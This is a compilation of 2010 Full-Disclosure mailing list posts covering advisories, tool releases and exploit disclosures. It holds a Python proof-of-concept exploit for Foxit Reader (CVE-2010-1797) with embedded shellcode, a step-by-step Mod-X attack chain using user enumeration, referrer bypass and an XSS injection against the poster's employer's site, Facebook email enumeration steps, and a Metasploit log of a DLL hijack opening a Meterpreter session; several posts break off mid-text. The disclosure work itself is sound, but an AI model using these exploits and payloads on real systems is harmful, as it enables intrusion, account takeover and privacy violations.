Re: [Full-disclosure] On the iPhone PDF and kernel exploit
Robert S'wie;cki escribió: On Fri, Aug 6, 2010 at 10:14 AM, Jose Miguel Esparza josemiguel.espa...@gmail.com wrote: Hi! I took a look at the PDF some days ago, looking for the PDF vuln, you can see my post  about it here: http://eternal-todo.com/blog/jailbreakme-pdf-exploit Anyway, I continue analysing it... citeAt the moment there's no available patch so it's recommended some type of mitigation and to be careful with the visited links/cite The fix seems to be here: http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=11d65e8a1f1f14e56148fd991965424d9bd1cdbc (http://www.kb.cert.org/vuls/id/275247) I wonder if this was in any way inspired by my previous bugreport in June (the same piece of code, slightly different attack vector). https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-2497 http://savannah.nongnu.org/bugs/index.php?30083 Maybe, maybe not.. Hi, I forgot to update this thread, maybe late but I add more info about it, more concretely, about the way the Type2 operands work and how this vulnerability can be exploited... http://eternal-todo.com/blog/more-jailbreakme-pdf-exploit Robert, I think it's not the same bug because yours is related to an integer overflow, isn't it? -- Jose Miguel Esparza http://eternal-todo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Athena SSL Cipher Scanner
I've posted a new SSL Cipher tool onto my website, at http://dmcdonald.net/athena-ssl-cipher-check_v052.tar.gz, Athena SSL Cipher Scanner. Unlike most SSL cipher scanners which have a limited list of ciphers they know of, athena checks all 65536 cipher codes. Of these codes it can identify ~150 different ciphers, if it finds a cipher which it cannot identify, it'll just inform you that it has found a unknown cipher. Rather than sending it 65536 requests to find these ciphers it sends large blocks of cipher codes, and uses the server response to narrow down it's search, similar to a binary search algorithm. It can scan most ssl services in a couple of minutes or so. Further speed improvements are in the pipeline. It currently works very well with IIS and apache, but seems to have issues with Sun HTTP Servers, the reasons behind which ive not yet fully explored. Note I've reimplimented part of sslv2, sslv3, and tls1, and for all ive know ive got it wrong and it could completely hose your box, use with caution in live environments. Id be greatful for any feed back/bugs/comments. Best, Renski ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WinAppDbg 1.4 is out!
What is WinAppDbg? == The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides an object-oriented abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test / fuzz Windows applications with quickly coded Python scripts. Several ready to use utilities are shipped and can be used for this purposes. Current features also include disassembling x86 native code (using the open source diStorm project, see http://ragestorm.net/distorm/), debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing. What's new in this version? === In a nutshell... * fully supports Python 2.4 through 2.7 * fully supports Windows XP through Windows 7, 32 and 64 bit editions * crash report tool now supports MSSQL (requires pyodbc) * now supports downloading debugging symbols from Microsoft (thanks Neitsa!) * new tool: sehtest.py (Windows SEH buffer overflow jump address bruteforcer, inspired by the same tool by Nicolas Economou) * the tutorial is now available in chm and pdf formats * now with only one MSI installer for all supported Python versions * added support for diStorm 3 (falls back to the old version if not found) * now using cerealizer instead of pickle whenever possible * added new command to the command line debugger to show the SEH chain * a few more anti-anti-debug tricks were added, still more to go! * several improvements to the Window instrumentation classes * more code examples * more Win32 API wrappers * lots of miscellaneous improvements, more documentation and bugfixes as usual! Entire changelog for all versions (slow!): http://p.sf.net/winappdbg/changelog Where can I find WinAppDbg? === Project homepage: - http://tinyurl.com/winappdbg Download links: --- Windows installer (32 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win32.msi/download Windows installer (64 bits) http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.exe/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.win-amd64.msi/download Source code http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.zip/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-1.4.tar.bz2/download Documentation: -- Online http://winappdbg.sourceforge.net/doc/v1.4/tutorial http://winappdbg.sourceforge.net/doc/v1.4/reference For download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.chm/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-tutorial-1.4.pdf/download http://sourceforge.net/projects/winappdbg/files/WinAppDbg/1.4/winappdbg-reference-1.4.pdf/download ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] London DEFCON - DC4420 - August meet - Wednesday 25th August 2010
allegedly, it's that time of the month again... as all our speakers are either dying from strep throat having spent more hours than is medically advisable in the company of desert heat and/or air conditioning, or are sunning themselves on some far away beach where dc4420 is the last thing on their minds, this month will be largely a social, where you get to buy me beer, interrupted only by a couple of lightning talks should the urge to speak overwhelm one or more of you... oh look, we have a volunteer already! alien will explain why chicago should absolutely positively be the last place you transit through on the way to vegas, and what happened when he got there... venue: Upstairs at The Black Horse, 6 Rathbone Place, W1T 1HH http://tinyurl.com/dc4420-venue nearest stations: Tottenham Court Road London Underground station (150m) - zone 1 Goodge Street London Underground station (440m) - zone 1 Oxford Circus London Underground station (630m) - zone 1 Leicester Square London Underground station (680m) - zone 1 Covent Garden London Underground station (750m) - zone 1 kickoff: Wed 25th August 2010 room ours from 18:00, talks start at 19:30 kitchen closes at 21:30 last orders 23:00 see you all there! http://dc4420.org cheers, MM -- In DEFCON, we have no names... errr... well, we do... but silly ones... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:160 ] cacti
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:160 http://www.mandriva.com/security/ ___ Package : cacti Date: August 24, 2010 Affected: Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: Multiple vulnerabilities has been found and corrected in cacti: Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7f, allow remote attackers to inject arbitrary web script or HTML via the (1) hostname or (2) description parameter to host.php, or (3) the host_id parameter to data_sources.php (CVE-2010-1644). Cacti before 0.8.7f, allows remote authenticated administrators to execute arbitrary commands via shell metacharacters in (1) the FQDN field of a Device or (2) the Vertical Label field of a Graph Template (CVE-2010-1645). Cross-site scripting (XSS) vulnerability in include/top_graph_header.php in Cacti before 0.8.7g allows remote attackers to inject arbitrary web script or HTML via the graph_start parameter to graph.php. NOTE: this vulnerability exists because of an incorrect fix for CVE-2009-4032.2.b (CVE-2010-2543). Cross-site scripting (XSS) vulnerability in utilities.php in Cacti before 0.8.7g, allows remote attackers to inject arbitrary web script or HTML via the filter parameter (CVE-2010-2544). Multiple cross-site scripting (XSS) vulnerabilities in Cacti before 0.8.7g, allow remote attackers to inject arbitrary web script or HTML via (1) the name element in an XML template to templates_import.php; and allow remote authenticated administrators to inject arbitrary web script or HTML via vectors related to (2) cdef.php, (3) data_input.php, (4) data_queries.php, (5) data_sources.php, (6) data_templates.php, (7) gprint_presets.php, (8) graph.php, (9) graphs_new.php, (10) graphs.php, (11) graph_templates_inputs.php, (12) graph_templates_items.php, (13) graph_templates.php, (14) graph_view.php, (15) host.php, (16) host_templates.php, (17) lib/functions.php, (18) lib/html_form.php, (19) lib/html_form_template.php, (20) lib/html.php, (21) lib/html_tree.php, (22) lib/rrd.php, (23) rra.php, (24) tree.php, and (25) user_admin.php (CVE-2010-2545). This update provides cacti 0.8.7f, which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1644 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1645 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2543 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2544 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2545 ___ Updated Packages: Corporate 4.0: 4134297861a2b57c17204497c8e474d1 corporate/4.0/i586/cacti-0.8.7g-0.1.20060mlcs4.noarch.rpm df74ca45bbe47160463f323828953474 corporate/4.0/SRPMS/cacti-0.8.7g-0.1.20060mlcs4.src.rpm Corporate 4.0/X86_64: e61de1b8ead28de422c10643f60d3f91 corporate/4.0/x86_64/cacti-0.8.7g-0.1.20060mlcs4.noarch.rpm df74ca45bbe47160463f323828953474 corporate/4.0/SRPMS/cacti-0.8.7g-0.1.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 7c9ae55dc3374c1c7fa848764447cf11 mes5/i586/cacti-0.8.7g-0.1mdvmes5.1.noarch.rpm ab0da7a454014b307109c50308b5ab9f mes5/SRPMS/cacti-0.8.7g-0.1mdvmes5.1.src.rpm Mandriva Enterprise Server 5/X86_64: fcda5deb37036ee6c5a784501ec32e70 mes5/x86_64/cacti-0.8.7g-0.1mdvmes5.1.noarch.rpm ab0da7a454014b307109c50308b5ab9f mes5/SRPMS/cacti-0.8.7g-0.1mdvmes5.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFMc6POmqjQ0CJFipgRAkUlAKDjSxc8B91AXSLUGYMFRdAKMwF8wQCfWrJs OUFj7V09JyDhxeSAoB3w86k= =LNa+ -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia -
[Full-disclosure] Exploit for Foxit Reader = 4.0 (CVE-2010-1797 - PDF Jailbreakme vuln)
Hi,
I've not seen published the proof of concept of this vuln affecting
Foxit Reader, so I attach it. This is a calc.exe shellcode, tested in
Windows XP and Windows Vista.
Cheers!
--
Jose Miguel Esparza
http://eternal-todo.com
import sys,zlib
def getFFShellcode(sc):
ff_sc = ''
if len(sc)%4 != 0:
sc += (4-len(sc)%4)*'\x00'
for i in range(0,len(sc),4):
ff_sc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i]
return ff_sc
outputHeader = '''
##
# FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797)#
##
##
# Product: Foxit Reader = 4.0 #
# Platforms: Windows XP, Windows Vista #
# Author: Jose Miguel Esparza jesparza AT eternal-todo DOT com #
# Web: http://eternal-todo.com #
# Date: 2010-08-23 #
##
##
'''
outputFileName = 'foxit_type2_poc.pdf'
usage = 'Usage: '+sys.argv[0]+' target\n\nTargets:\n\t0 - Foxit Reader 3.0\n\t1 - Foxit Reader 3.0\n\t2 - Other versions'
COMEX_PDF_TEMPLATE = '''%PDF-1.3
%\xbe\xbe\xba\xba
4 0 obj
/Length 631
stream
q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc
7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q
1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta)
-0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4
( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT
-0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( )
-1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc
18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm
/F2.0 1 Tf ( ) Tj ET Q Q
endstream
endobj
2 0 obj
/Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792]
endobj
5 0 obj
/ProcSet [ /PDF /Text ] /ColorSpace /Cs1 6 0 R /Font /F2.0 8 0 R
endobj
3 0 obj
/Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ]
endobj
7 0 obj
/Type /Catalog /Pages 3 0 R
endobj
11 0 obj
/Subtype/Type1C
/Filter[/FlateDecode]
/Length $CFF_STREAM_LENGTH
stream
$CFF_STREAM
endstream
endobj
9 0 obj
/Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32
/FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle
0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R
endobj
10 0 obj
[ 556 ]
endobj
8 0 obj
/Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor
9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding
endobj
1 0 obj
endobj
xref
0 12
00 65535 f
017767 0 n
000408 0 n
003397 0 n
22 0 n
000389 0 n
000512 0 n
003361 0 n
017359 0 n
007240 0 n
000622 0 n
003340 0 n
trailer
/Size 12 /Root 7 0 R /Info 1 0 R
startxref
17942
%%EOF
'''
MAX_FF_SECTION_LEN = 45*5
JUMP_BYTE = ['\xcd','\xcc']
POP_POP_RET_ADDRESS = ['\x00\x40\x11\x85','\x00\x40\xce\x36'] # Foxit reader addresses, depending on the version
NUM_SECOND_INSTRUCTIONS_SET = [183,182]
# calc.exe shellcode
shellcode = '\x68\x10\xf5\x00\x00\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x58\x66\x3b\xd0\x50\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\x66\x3d\x10\xf5\x75\x0e\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xff\xd5\x68\x06\xcb\x00\x00\xeb\x92'
cff_header = '\x01\x00\x04\x01\x00\x01\x01\x01\x13ABCDEF+Times-Roman\x00\x01\x01\x01\x1f\xf8\x1b\x00\xf8\x1c\x02\xf8\x1d\x03\xf8\x19\x04\x1co\x00\r\xfb\xfbn\xfa|\xfa\x16\x05\xe9\x11\x8b\x8b\x12\x00\x03\x01\x01\x08\x13\x18001.007Times RomanTimes\x00\x00\x00\x02\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x04\xdc'
if len(sys.argv) 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1:
sys.exit(usage)
version = int(sys.argv[1])
if version == 2:
sys.exit('Versions 3.0 are not implemented, try it!! ;)\n')
if version 2:
sys.exit(usage)
print outputHeader
print '[-] Creating PDF file...'
# Building the FF section
ff_shellcode = getFFShellcode(shellcode)
ff_zero_bytes =
Re: [Full-disclosure] [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Mon, 23 Aug 2010 10:36:42 +0700 Bkis min...@bkav.com.vn wrote: [Bkis-04-2010] Multiple Vulnerabilities in OpenBlog 1. General Information OpenBlog is a free software for developing blogging platform. OpenBlog is written on PHP language and available at http://www.open-blog.info. In August 2010, Bkis Security discovered some XSS, CSRF vulnerabilities on this software; especially, there is a vulnerability which might allow privilege elevation on OpenBlog 1.2.1. Taking advantage of this vulnerability, hacker might execute malicious code on user's browser or even get control of Blog. Bkis has sent its warning to the developer. Details: http://security.bkis.com/?p=1382 SVRT Advisory: Bkis-04-2010 Initial vendor notification: 08/09/2010 Release Date: 08/23/2010 Update Date: 08/23/2010 Discovered by: Duong Manh Linh, Truong Tu Hai, Nguyen Hoang Vinh - Bkis Attack Type: Bypass Authentication, XSS, CSRF Security Rating: High Impact: Code Execution Affected Software: Openblog v1.2.1 2. Technical Details The most dangerous vulnerability resides on session module of OpenBlog. Exploiting this vulnerability, hacker can sign in a normal user' account but obtain administrator' privileges. This is due to the weakness in user's rights checking and authenticating mechanism, resulting in the high possibility of faking administrators' privileges. Besides, Bkis also found some XSS and CSRF vulnerabilities on the following OpenBlog's functions: XSS holes are found on the following modules: - Create a new post - Edit a post - Create a new page Because these modules' input variables are not adequately checked and filtered, hacker might insert his code into the path's links. If a user logins to his Blog and clicks the link, hacker's malicious code (JavaScript) will be executed, leading to the loss of user's personal information saved on the browser. CSRF vulnerabilities are found on the following modules: - Edit an user - Setting - Templates - Disable/Enable Sidebar - Feed settings - Bookmarking - New post - Edit a post - Delete a post - New page - Edit a page - Delete a page - New navigation item - Edit a navigation item - New link - Edit a link - Delete a link - New category - Edit a category - Delete a category - Delete a comment - Delete an user OpenBlog does not require user's confirmation when performing the above functions. Therefore, users might be tricked into performing unwanted actions without their consent, like clicking faulty links, etc. Specifically, hacker might fool Blog's administrators into deleting, editing the posts on the Blog. 3. Solution Rating the vulnerability as critical, Bkis recommends organizations, individuals using OpenBlog be cautious with links of unknown origins. At the same time, users should keep themselves updated with the developer's information to get timely update. -- Bkis (www.bkis.com) Blog (blog.bkis.com) Do you have CVE-identifier for these vulnerabilities? Best regards, Henri Salo -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkxz+OIACgkQXf6hBi6kbk/YUgCfX6TdYIBlXQJe1gSPWZ6Ge/T5 2/oAoLyjKxthFwJXtznB7Eh5xnh/uxK9 =kNMK -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Mod-X Multiple Vulnerabilities (exploit chaining)
Got bored and decided to break the new website of the company I work for.
Throughout I'll be dropping two new exploits that were chained to allow the
changing of the administrative password of a default mod-x install. This is
not a full review of mod-x, my main goal was just to break something, so I
went with the first exploit I found.
If you know me, you know I don't disclose unless you can exploit without
user interaction. However, I thought it was a cool writeup on how security
mechanisms were bypassed that I thought I would share.
Did not discover much input that can be manipulated until I ran across a
modx extension called ditto. Through ditto, I was able to discover a full
path disclosure:
http://www.victim.com/archives?myDittoCall_year=2009myDittoCall_month=falsemyDittoCall_day=falsemyDittoCall_start[]=0
Error message:
« MODx Parse Error »
MODx encountered the following error while attempting to parse the requested
resource:
« PHP Parse Error »
PHP error debug
Error: htmlspecialchars() expects parameter 1 to be string, array
given
Error type/ Nr.: Warning - 2
File: /var/www/vhosts/
victim.com/httpdocs/assets/snippets/ditto/classes/ditto.class.inc.php
Line: 1077
Line 1077 source: $query[htmlspecialchars($param, ENT_QUOTES)] =
htmlspecialchars($value, ENT_QUOTES);
Parser timing
MySQL: 0.0022 s(19 Requests)
PHP: 0.1612 s
Total: 0.1633 s
Effected Code (even though error is pretty verbose):
foreach ($_GET as $param=$value) {
if ($param != 'id' $param != 'q') {
$query[htmlspecialchars($param, ENT_QUOTES)] =
htmlspecialchars($value, ENT_QUOTES);
}
}
First things first, htmlspecialchars with ENT_QUOTES seems to be messing
with all of our injections. No charset appears to be specified, let's take
a look at their default charset, perhaps one was specially set.
UTF-8 is default charset, no special reflective injection point.
However, we do have a full path disclosure and we now know that
victim.comis running modx, let's go download that!
*After fscking around, found that they use Evolution and not Revolution
version of mod-x*
http://www.victim.com/manager/ - Our login entry point.
Looks like there's no nonce checking so csrf is a viable option after some
modification. First, let's acquire some sort of username we can use to
manipulate/create users (or something of equal fun).
http://www.victim.com/manager/index.php?action=show_form
Very nice! The forgot password form is happy to verify if the user exists
via the email or not. Good chances that the email will be u...@victim.com.
This information can be used to advance our attack.
After a lot of looking around and guessing names I finally ran across a
valid user by looking around the site for contact emails and other
usernames. Turns out it was a marketing person (+1 SE aid).
After finding a valid user email, I was able to now work on crafting the
exploit and using spear social engineering to exponentially increase the
likelihood of an attack (spear phishing is very successful).
Now, there are all sorts of valid CSRF around. However, we have a problem.
victim.com/manager/index.php checks referrers. index.php includes/requires
the actions that we want to have fun with.
a.) Attack vector 1: See how strenuous the checks are for the referrer.
Possibly attack a hosted sub-domain or another application (blog? Open
source apps seem to work together.).
if (!empty($referer)) {
if (!preg_match('/^'.preg_quote(MODX_SITE_URL, '/').'/i',
$referer)) {
b.) Attack vector 2: Find a CSRF outside of index.php or directly access
included/required files so referrer check is never executed. Problem is
direct includes don't work on most of the fun scripts because of:
if (IN_MANAGER_MODE != true)
die(bINCLUDE_ORDERING_ERROR/bbr /br /Please use the MODx
Content Manager instead of accessing this file directly.);
c.) Attack vector 3: Somehow get the script on the site. Not likely
otherwise this would probably never be needed.
d.) Attack vector 4: Find an xss to reflect a self-submitting form.
However, protect.inc.php seems to have basic xss protection and is included
in most scripts.
'@script[^]*?.*?/script@si',
'@#(\d+);@e',
'@\[\[(.*?)\...@si',
'@\[!(.*?)!...@si',
'@\[\~(.*?)\...@si',
'@\[\((.*?)\)\...@si',
'@{{(.*?)}...@si',
'@\[\+(.*?)\...@si',
'@\[\*(.*?)\...@si'
After a bit of digging around (30 minutes) in the scripts, I found a simple
injection point in /manager/media/ImageEditor/editor.php.
titleImage Editor - ?php echo $_GET['img']; ?/title
Great! However, protect.inc.php is included. So script gets stripped.
That's alright, let's find another way to run our javascript.
/title/headbody onload=alert('hi');
This is why blacklists fail. Now all we need is a self-submitting form by
placing javascript inside onload. Current Injection:
/title/headbody
[Full-disclosure] Facebook Information Leakage ... Again
1. Navigate to the Facebook Friend Finder feature. 2. Click the Upload Contact File option in order to access the file upload prompt. 3. Upload a contact file of ANY of the accepted formats that contains a list of email addresses that you would like to enumerate. 4. Select the target email(s), and click Invite to Join. 5. If the email you are targeting DOES have a restricted Facebook profile then an email invite will not be sent, and a page which contains a link to the Facebook profile associated with the target email address to be enumerated will be displayed, thus allowing you to link the email with the corresponding account. Screens @ http://0x6a616d6573.blogspot.com/2010/08/facebook-information-leakage-again.html ~James ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] t2′10 Challenge to be release d 2010-08-28 10:00 EEST
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Since the dawn of our species (well 2005, if you want to be picky about it) t2 has been granting free admission to the elite of their kind, the winners of the t2 Challenges. Don’t be suckered in by all the cheap imitations out there, their snooze-fest la-di-da dog and pony shows, because t2 is back! And we’re pleased to announce the release of the t2’10 Challenge! Now is your chance to join the past elites (http://t2.fi/challenge/) by winning free admission to this year’s t2’10 Infosec Conference! This year’s t2’10 Challenge is based on multi-staging (much like good shell code), which will be powered by a scoreboard (http://t2.fi/ext/scoreboard) so that you can see — (almost) in real time — how the other participants are fairing out there in the land of the living. The rules are simple: t2 will release the t2’10 Challenge and the first one to solve it will win free admission to the t2’10 Infosec Conference. But don’t stop just because you weren’t the first one to solve it: The Advisory Board will select another winner among the next ten correct answers, paying particular attention to the elegance of the solution rather than the speed. In other words you can win with either speed or style :) The t2’10 Challenge will be released 2010-08-28 10:00 EEST at http://t2.fi/ Good luck, - -- Tomi 'T' Tuominen tomi.tuomi...@t2.fi Founder - t2 information security conference tel. +358 400 796 064 - fax. +358 401 796 064 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (Darwin) iEYEARECAAYFAkx0FCUACgkQlPoxKJv6bEpOTQCgqStiGRTGDpKUxI3ulFABU4B1 OQ4AoKnnRVWr2TqBTtj5Vk+6wSP72g1E =7aR7 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll)
For those interested, I just discovered that the Windows Address Book is vulnerable to DLL hijacking when opening .vcf (and probably other) file types. http://www.attackvector.org/new-dll-hijacking-exploits-many/ [..snip..] [*] 10.0.0.252:1137 PROPFIND /hacku/wab32res.dll [*] 10.0.0.252:1137 PROPFIND = 207 File (/hacku/wab32res.dll) [*] 10.0.0.252:1133 GET = DLL Payload [*] 10.0.0.252:1137 PROPFIND /hacku/rundll32.exe [*] 10.0.0.252:1137 PROPFIND = 404 (/hacku/rundll32.exe) [*] 10.0.0.252:1133 GET = DATA (/hacku/owned.vcf) [*] Sending stage (748544 bytes) to 10.0.0.252 [*] Meterpreter session 4 opened (1.2.3.4:31337 - 10.0.0.252:1155) at Tue Aug 24 13:49:02 -0500 2010 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL hijacking (Windows Address Book -wab32res.dll)
Thanks for the info Matt and nice blog by the way. Infolookup http://infolookup.securegossip.com www.twitter.com/infolookup -Original Message- From: matt m...@attackvector.org Sender: full-disclosure-boun...@lists.grok.org.uk Date: Tue, 24 Aug 2010 13:57:42 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] DLL hijacking (Windows Address Book - wab32res.dll) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:161 ] vte
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:161 http://www.mandriva.com/security/ ___ Package : vte Date: August 24, 2010 Affected: 2009.1, 2010.0, 2010.1 ___ Problem Description: A vulnerability has been found and corrected in vte: The vte_sequence_handler_window_manipulation function in vteseq.c in libvte (aka libvte9) in VTE 0.25.1 and earlier, as used in gnome-terminal, does not properly handle escape sequences, which allows remote attackers to execute arbitrary commands or obtain potentially sensitive information via a (1) window title or (2) icon title sequence. NOTE: this issue exists because of a CVE-2003-0070 regression (CVE-2010-2713). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2713 ___ Updated Packages: Mandriva Linux 2009.1: b2d5a79aa4530215ba63bc5a95173de0 2009.1/i586/libvte9-0.20.1-1.1mdv2009.1.i586.rpm e734de2689ad3cf33cd9ca2753f7b0a8 2009.1/i586/libvte-devel-0.20.1-1.1mdv2009.1.i586.rpm aa73f0033be676f1299c7740d4955491 2009.1/i586/python-vte-0.20.1-1.1mdv2009.1.i586.rpm ccf35018be4d70b879fbe57b472b29cf 2009.1/i586/vte-0.20.1-1.1mdv2009.1.i586.rpm a347acab6a738ed56ffbd8236e373324 2009.1/SRPMS/vte-0.20.1-1.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 9e6cbdb9dca23f70463e06c21c52d903 2009.1/x86_64/lib64vte9-0.20.1-1.1mdv2009.1.x86_64.rpm 007a2b90ccb566c8a27b34f54decfd7f 2009.1/x86_64/lib64vte-devel-0.20.1-1.1mdv2009.1.x86_64.rpm 9d632a3c14d1c608506bcdec8f3643ef 2009.1/x86_64/python-vte-0.20.1-1.1mdv2009.1.x86_64.rpm f9e4b7463247e2e10c4e98c3cb5e3b35 2009.1/x86_64/vte-0.20.1-1.1mdv2009.1.x86_64.rpm a347acab6a738ed56ffbd8236e373324 2009.1/SRPMS/vte-0.20.1-1.1mdv2009.1.src.rpm Mandriva Linux 2010.0: 549b27c9e0429b7e4e9d28d542c0f3c0 2010.0/i586/libvte9-0.22.2-1.1mdv2010.0.i586.rpm 01947d45f16ae3c9b76e87e76f4b0b10 2010.0/i586/libvte-devel-0.22.2-1.1mdv2010.0.i586.rpm 261d4ef94143a26dc790437614fe947a 2010.0/i586/python-vte-0.22.2-1.1mdv2010.0.i586.rpm bdcee6ea9f94dd2385d3f0dfeea7d36d 2010.0/i586/vte-0.22.2-1.1mdv2010.0.i586.rpm e3f61964adb4a8d6f09bc0896a4686f9 2010.0/SRPMS/vte-0.22.2-1.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 18add7986f54185f81fc95e488eff106 2010.0/x86_64/lib64vte9-0.22.2-1.1mdv2010.0.x86_64.rpm c457e799d9019c7424c331e7b9bfe386 2010.0/x86_64/lib64vte-devel-0.22.2-1.1mdv2010.0.x86_64.rpm 3bd940fe7ad0864328901c556c592c6d 2010.0/x86_64/python-vte-0.22.2-1.1mdv2010.0.x86_64.rpm 1e2485690ad232f32d4e1cd1862ede5a 